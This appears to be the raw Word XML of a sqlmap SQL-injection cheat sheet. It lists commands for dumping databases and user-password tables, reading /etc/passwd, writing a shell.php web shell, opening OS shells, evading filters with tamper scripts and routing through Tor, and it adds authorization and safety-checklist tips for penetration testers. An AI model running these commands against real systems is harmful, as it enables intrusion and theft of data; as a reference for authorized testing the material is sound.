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8895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 xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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 xml:space="preserve"> — Professional Cheat Sheet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E1C193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Quick reference (most-used flags)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CC1194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Target &amp; general</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CB00D4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-u URL                      # target URL (GET)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEBA959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-d "param=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val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&amp;… "           # POST data (use with -u or alone)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCC7734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--data='param=1&amp;param2=2'   # send POST body</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1805BE64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--cookie='PHPSESSID=xxx'    # send cookies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBD345A" w14:textId="31E7ADEF" w:rsid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--headers='User-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Agent:…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,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X:…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' # custom headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA510FC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548E4805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Discovery / scan profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716DD43C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--batch                    # non-interactive (use answers: default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D73FBA2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--level=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1..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5               # how deep to go (default 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058936D1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--risk=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1..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3                # injection risk (default 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C08B5E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--threads=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1..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50            # concurrent threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75377825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--timeout=10               # network timeout (sec)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C090ED0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--time-sec=5               # time delay for time-based</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328A26A4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78F93CC3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Injection techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9D073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--technique=&lt;letters&gt;      # e.g. --technique=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BEUS  (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B=Boolean, E=Error, U=Union, S=Time)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2AA4EA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2205A05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Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE502D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--banner                   # DBMS banner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AAFF20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dbs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                     # list databases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230A1C42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--tables -D &lt;DB&gt;           # list tables in DB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EADB34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--columns -D &lt;DB&gt; -T &lt;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tbl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&gt; # list columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE841D1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--dump -D &lt;DB&gt; -T &lt;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tbl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&gt;    # dump table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4231C64B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--dump-all                 # dump everything</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A90FD25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--search -T &lt;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tbl|col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&gt; -D &lt;DB&gt; -C &lt;col&gt; # search for string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774C3C5F" w14:textId="77777777" w:rsid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7701D4FF" w14:textId="77777777" w:rsid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0BF304F7" w14:textId="77777777" w:rsid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22DA1B6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42B4F0BD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lastRenderedPageBreak/>
        <w:t># Targeted SQL / shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32844F9D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-query='&lt;QUERY&gt;'      # run custom SQL query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EF026B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-shell                # interactive SQL shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243C882F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os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-shell                 # interactive OS shell (if possible)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41412739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os-cmd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='id'              # single OS command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8A9FBA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os-pwn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                  # attempt to get a persistent shell / privilege escalation (use with caution)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101EA39A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--file-read=/etc/passwd    # read file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0276F655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--file-write=/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tmp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shell.php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--file-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dest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/var/www/html/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shell.php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 #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write file (when allowed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D4D4E0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07F75F7C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Output / sessions / verbosity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3816D4D1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--output-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dir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=/path         # save results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEF1550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--flush-session            # remove stored session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1511918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--resume                   # resume previous session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E08BE5C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-v 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0..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6                    # verbosity (higher = more logs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107BB2DB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51E5B272">
          <v:rect id="_x0000_i1079" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="74893075" w14:textId="303EC3B1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Typical usage examples</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E14DB7C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1) Quick detection (GET)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1134FBF1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spiderfoot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? no; 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page.php?id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=1" --batch --threads=5 --level=2 --risk=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B20280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2) Enumerate DBs → tables → dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2016B9F3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page.php?id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=1" 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dbs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--batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E863C4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page.php?id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=1" -D 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users_db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--tables --batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48480A6E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page.php?id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=1" -D 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users_db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-T users --columns --batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC4E89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page.php?id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=1" -D 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users_db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-T users --dump --batch -C </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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id,username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,password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="331BBF66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3) POST form, custom headers, cookie auth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8A7E07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login.php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" --data="user=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admin&amp;pass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=1234" --cookie="PHPSESSID=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abcd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" --headers="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Referer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: http://example.com/" --batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E11A171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4) Custom SQL query (targeted)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456B502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"http://example.com/?id=1" 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-query="SELECT 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COUNT(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*) FROM users" --batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033D6482" w14:textId="77777777" w:rsid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</w:p>
    <w:p w14:paraId="40EEDBC8" w14:textId="72E62C46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lastRenderedPageBreak/>
        <w:t>5) Extract a file from the server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26726BEA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"http://example.com/?id=1" --file-read="/etc/passwd" --batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA2A4D6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6) Run single OS command (if DBMS allows)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109A5B65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"http://example.com/?id=1" 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os-cmd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="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whoami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" --batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB0E745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7) Run safely and quietly (low noise)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A4F0AB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"http://example.com/?id=1" --batch --level=1 --risk=1 --threads=1 --timeout=15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B1CF93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73FBA982">
          <v:rect id="_x0000_i1080" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B751332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Auth &amp; proxy examples</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256E2202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HTTP Basic auth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1B6D16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page.php?id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=1" --auth-type=Basic --auth-cred="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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user:pass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7034ADF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30030026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NTLM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2991C9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... --auth-type=NTLM --auth-cred="DOMAIN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\\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user:pass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCAC003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4C34ED75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Use Burp/Proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25868E74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page.php?id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=1" --proxy="http://127.0.0.1:8080" --proxy-cred="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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user:pass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3613AFAA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2C46D717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Use SOCKS/Tor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B64806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... --proxy="socks5://127.0.0.1:9050"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF5F0A3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18A2E839">
          <v:rect id="_x0000_i1081" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="291D6A9E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Techniques (what they mean)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688FFB39" w14:textId="77777777" w:rsidR="00715C2B" w:rsidRPr="00715C2B" w:rsidRDefault="00715C2B" w:rsidP="00715C2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Boolean-based (B)</w:t>
      </w:r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true/false responses to infer data. Reliable and stealthy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A5B303" w14:textId="77777777" w:rsidR="00715C2B" w:rsidRPr="00715C2B" w:rsidRDefault="00715C2B" w:rsidP="00715C2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Error-based (E)</w:t>
      </w:r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forces DB errors to extract data quickly (noisy).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD17D37" w14:textId="77777777" w:rsidR="00715C2B" w:rsidRPr="00715C2B" w:rsidRDefault="00715C2B" w:rsidP="00715C2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Union-based (U)</w:t>
      </w:r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uses UNION SELECT to get data via normal responses (fast but depends on query structure).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BD7C05" w14:textId="77777777" w:rsidR="00715C2B" w:rsidRPr="00715C2B" w:rsidRDefault="00715C2B" w:rsidP="00715C2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Time-based (S)</w:t>
      </w:r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injects delays and measures response time (use when responses not visible).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184BD23E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Use: --technique=BEUS to try all four.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCD42E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3CB3A042">
          <v:rect id="_x0000_i1082" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3435E1C7" w14:textId="77777777" w:rsid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</w:p>
    <w:p w14:paraId="70465465" w14:textId="77777777" w:rsid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</w:p>
    <w:p w14:paraId="708C8277" w14:textId="1223537B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lastRenderedPageBreak/>
        <w:t>Common tamper scripts (bypass filters)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5975F44F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Use --tamper=script</w:t>
      </w:r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1,script</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00715C2B">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono SemiLight" w:hAnsi="Cascadia Mono SemiLight" w:cs="Cascadia Mono SemiLight"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00715C2B">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono SemiLight" w:hAnsi="Cascadia Mono SemiLight" w:cs="Cascadia Mono SemiLight"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>Common ones:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2A55E4" w14:textId="77777777" w:rsidR="00715C2B" w:rsidRPr="00715C2B" w:rsidRDefault="00715C2B" w:rsidP="00715C2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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space2comment — converts spaces to /**/ comment style</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2DC179" w14:textId="77777777" w:rsidR="00715C2B" w:rsidRPr="00715C2B" w:rsidRDefault="00715C2B" w:rsidP="00715C2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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between — uses BETWEEN-based payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02644143" w14:textId="77777777" w:rsidR="00715C2B" w:rsidRPr="00715C2B" w:rsidRDefault="00715C2B" w:rsidP="00715C2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:num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charencode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encodes characters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B285605" w14:textId="77777777" w:rsidR="00715C2B" w:rsidRPr="00715C2B" w:rsidRDefault="00715C2B" w:rsidP="00715C2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:num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apostrophemask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mask single quotes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3578DDE1" w14:textId="77777777" w:rsidR="00715C2B" w:rsidRPr="00715C2B" w:rsidRDefault="00715C2B" w:rsidP="00715C2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:num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randomcase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randomizes case to bypass naive filters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E4C5F8" w14:textId="77777777" w:rsidR="00715C2B" w:rsidRPr="00715C2B" w:rsidRDefault="00715C2B" w:rsidP="00715C2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:num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suffixcomment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add comment suffixes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8BB500" w14:textId="77777777" w:rsidR="00715C2B" w:rsidRPr="00715C2B" w:rsidRDefault="00715C2B" w:rsidP="00715C2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:num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hexencode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— encode string as hex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39ABAF3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(Exact tamper names on your system: ls /path/to/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/tamper or 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--help.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6DD8AE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5217DDBD">
          <v:rect id="_x0000_i1083" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="331E3CD1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DBMS-specific switches &amp;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7544"/>
      </w:tblGrid>
      <w:tr w:rsidR="00715C2B" w:rsidRPr="00715C2B" w14:paraId="0F5A1F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FDAD8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b/>
                <w:bCs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b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20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3D4B5DCC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b/>
                <w:bCs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b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Tips / special</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00715C2B" w:rsidRPr="00715C2B" w14:paraId="091F6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442A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2008B549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fast UNION/error/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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boolean</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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; use --</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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sql</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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-shell or --</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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os-cmd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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 xml:space="preserve"> with INTO OUTFILE if writable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00715C2B" w:rsidRPr="00715C2B" w14:paraId="7E347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BEC5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5312402A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supports many functions; use --</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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os</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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-shell via COPY TO/FROM if possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00715C2B" w:rsidRPr="00715C2B" w14:paraId="1BE3D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5FDF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MSSQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6252C1DB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 xml:space="preserve">supports </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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xp_cmdshell</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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 xml:space="preserve"> for OS commands if enabled</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00715C2B" w:rsidRPr="00715C2B" w14:paraId="7A4EE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451CA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56C262A3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pay attention to DUAL usage and schema names (SYS, SYSDBA)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00715C2B" w:rsidRPr="00715C2B" w14:paraId="58868E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294F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1E0FA055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 xml:space="preserve">local file </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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db</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> — sometimes easier to dump via file-read</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00715C2B" w:rsidRPr="00715C2B" w14:paraId="10F10F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687B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MSSQL/Oracle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CFA147F" w14:textId="77777777" w:rsidR="00715C2B" w:rsidRPr="00715C2B" w:rsidRDefault="00715C2B" w:rsidP="00715C2B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cascadia Mono SemiLight" w:hAnsi="Cascadia Mono SemiLight" w:cs="Cascadia Mono SemiLight"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00715C2B">
              <w:rPr>
                <w:rFonts w:ascii="Cascadia Mono SemiLight" w:hAnsi="Cascadia Mono SemiLight" w:cs="Cascadia Mono SemiLight"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>stacked queries may work for some payloads</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0AEC604B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If you know DBMS: pass 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dbms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mysql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to speed up and tailor payloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2936D8F7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78A28CB9">
          <v:rect id="_x0000_i1084" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="382E4CA7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Output, sessions &amp; automation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633F8319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Save results to folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16954D85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"http://..." --batch --output-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dir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=/root/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sqlmap_out</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="78CBAF52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3911CBFC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Use sessions (resume later)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACB4B4D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"http://..." --batch    # saves session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6414B11F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--resume</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DBDEB0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75FAB30B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lastRenderedPageBreak/>
        <w:t># Non-interactive scripting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB3942C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"http://..." --batch --threads=10 --level=3 --risk=2 -o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00715C2B">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono SemiLight" w:hAnsi="Cascadia Mono SemiLight" w:cs="Cascadia Mono SemiLight"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>result.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5D483A78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0EFD9916">
          <v:rect id="_x0000_i1085" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F7E94F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Tips for real engagements / OPSEC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBE3BC3" w14:textId="77777777" w:rsidR="00715C2B" w:rsidRPr="00715C2B" w:rsidRDefault="00715C2B" w:rsidP="00715C2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Permission first.</w:t>
      </w:r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Only test targets you own or have explicit authorization to test.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20078D4C" w14:textId="77777777" w:rsidR="00715C2B" w:rsidRPr="00715C2B" w:rsidRDefault="00715C2B" w:rsidP="00715C2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Use --batch in scripts but double-check destructive flags (--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os-pwn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>, file-write).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC44DD6" w14:textId="77777777" w:rsidR="00715C2B" w:rsidRPr="00715C2B" w:rsidRDefault="00715C2B" w:rsidP="00715C2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Start low/noise: --level=1 --risk=1 --threads=1 then increase if authorized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EAF18B" w14:textId="77777777" w:rsidR="00715C2B" w:rsidRPr="00715C2B" w:rsidRDefault="00715C2B" w:rsidP="00715C2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Use API keys / authenticated sessions to avoid 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bruteforce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blocking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D41436D" w14:textId="77777777" w:rsidR="00715C2B" w:rsidRPr="00715C2B" w:rsidRDefault="00715C2B" w:rsidP="00715C2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Use proxies (Burp) to inspect payloads before running --batch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC49606" w14:textId="77777777" w:rsidR="00715C2B" w:rsidRPr="00715C2B" w:rsidRDefault="00715C2B" w:rsidP="00715C2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Use --tamper sparingly — try to understand the filter first.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBC2D76" w14:textId="77777777" w:rsidR="00715C2B" w:rsidRPr="00715C2B" w:rsidRDefault="00715C2B" w:rsidP="00715C2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Be mindful of production impact: large dumps or heavy </w:t>
      </w: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boolean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scans can crash DB or app.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6128D411" w14:textId="77777777" w:rsidR="00715C2B" w:rsidRPr="00715C2B" w:rsidRDefault="00715C2B" w:rsidP="00715C2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Log everything in your report: command used, timestamps, session files, outputs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765C85F6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31E6887B">
          <v:rect id="_x0000_i1086" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="568C1CE3" w14:textId="77777777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t>Troubleshooting &amp; debug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583D074E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Verbose output to debug injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384E292E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"http://..." -v 3 --batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298EAE7E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61C8D703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If time-based is unreliable, bump --time-sec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70ED739D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"http://..." --technique=S --time-sec=10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607952F5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297063D6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If target blocks common UA:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B2D29F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"http://..." --random-agent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0246FB5A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</w:p>
    <w:p w14:paraId="78255A26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# If parameters hidden in JavaScript, use --crawl=DEPTH or intercept with Burp to capture exact request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C005553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15C2B">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono SemiLight" w:hAnsi="Cascadia Mono SemiLight" w:cs="Cascadia Mono SemiLight"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00715C2B">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono SemiLight" w:hAnsi="Cascadia Mono SemiLight" w:cs="Cascadia Mono SemiLight"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u "http://example.com/" --crawl=2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D622C0" w14:textId="77777777" w:rsidR="00715C2B" w:rsidRPr="00715C2B" w:rsidRDefault="00715C2B" w:rsidP="00715C2B">
      <w:p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pict w14:anchorId="740EA5F4">
          <v:rect id="_x0000_i1087" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E04EAA" w14:textId="77777777" w:rsid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</w:p>
    <w:p w14:paraId="0503B986" w14:textId="77777777" w:rsid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</w:p>
    <w:p w14:paraId="08FFF22D" w14:textId="1836AFD2" w:rsidR="00715C2B" w:rsidRPr="00715C2B" w:rsidRDefault="00715C2B" w:rsidP="00715C2B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono SemiLight" w:hAnsi="Cascadia Mono SemiLight" w:cs="Cascadia Mono SemiLight"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715C2B">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono SemiLight" w:hAnsi="Cascadia Mono SemiLight" w:cs="Cascadia Mono SemiLight"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Quick safety checklist before you run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFA5454" w14:textId="77777777" w:rsidR="00715C2B" w:rsidRPr="00715C2B" w:rsidRDefault="00715C2B" w:rsidP="00715C2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Permission / scope confirmed (in writing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67820C41" w14:textId="77777777" w:rsidR="00715C2B" w:rsidRPr="00715C2B" w:rsidRDefault="00715C2B" w:rsidP="00715C2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Non-production or approved time window selected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031D0F7B" w14:textId="77777777" w:rsidR="00715C2B" w:rsidRPr="00715C2B" w:rsidRDefault="00715C2B" w:rsidP="00715C2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Backups exist (if testing production)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE78A73" w14:textId="77777777" w:rsidR="00715C2B" w:rsidRPr="00715C2B" w:rsidRDefault="00715C2B" w:rsidP="00715C2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Logging enabled and results stored securely</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B70A10" w14:textId="77777777" w:rsidR="00715C2B" w:rsidRPr="00715C2B" w:rsidRDefault="00715C2B" w:rsidP="00715C2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono SemiLight" w:hAnsi="Cascadia Mono SemiLight" w:cs="Cascadia Mono SemiLight"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
